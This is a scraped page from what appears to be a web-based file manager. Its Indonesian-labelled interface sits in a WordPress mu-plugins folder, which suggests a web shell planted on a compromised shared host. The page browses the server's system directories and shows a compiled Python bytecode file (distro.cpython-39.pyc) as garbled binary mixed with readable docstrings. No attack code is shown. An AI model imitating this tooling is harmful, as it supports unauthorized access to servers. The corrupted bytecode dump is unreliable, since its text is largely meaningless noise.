📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
kcare
›
python
›
📁 __pycache__
📍
Lokasi:
/usr/libexec/kcare/python/__pycache__
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: distro.cpython-39.pyc
a ��;j�� � @ s d Z ddlZddlZddlZddlZddlZddlZddlZddlZddl Z ddl mZmZm Z mZmZmZmZmZmZ zddl mZ W n ey� eZY n0 dZG dd� de�ZG dd � d e�Zej�d d�Zej�dd �ZdZddd�Zdddddd�Z ddiZ!e�"d�Z#e�"d�Z$g d�Z%dddedddfZ&dTe'ee(e(e(f d�d d!�Z)e(d"�d#d$�Z*dUe'e(d&�d'd(�Z+dVe'e'e(d)�d*d+�Z,dWe'ee(e(e(f d,�d-d.�Z-dXe'e(d,�d/d0�Z.dYe'e(d,�d1d2�Z/dZe'e(d,�d3d4�Z0e(d"�d5d6�Z1e(d"�d7d8�Z2d[e'e'ed)�d9d:�Z3e e(e(f d"�d;d<�Z4e e(e(f d"�d=d>�Z5e e(e(f d"�d?d@�Z6e e(e(f d"�dAdB�Z7e(e(dC�dDdE�Z8e(e(dC�dFdG�Z9e(e(dC�dHdI�Z:e(e(dC�dJdK�Z;zddLl<m=Z= W n" e�y� G dMdN� dN�Z=Y n0 G dOdP� dP�Z>e>� Z?dd"�dQdR�Z@eAdSk�re@� dS )\a� The ``distro`` package (``distro`` stands for Linux Distribution) provides information about the Linux distribution it runs on, such as a reliable machine-readable distro ID, or version information. It is the recommended replacement for Python's original :py:func:`platform.linux_distribution` function, but it provides much more functionality. An alternative implementation became necessary because Python 3.5 deprecated this function, and Python 3.8 removed it altogether. Its predecessor function :py:func:`platform.dist` was already deprecated since Python 2.6 and removed in Python 3.8. Still, there are many cases in which access to OS distribution information is needed. See `Python issue 1322 <https://bugs.python.org/issue1322>`_ for more information. � N) �Any�Callable�Dict�Iterable�Optional�Sequence�TextIO�Tuple�Type)� TypedDictz1.8.0c @ s&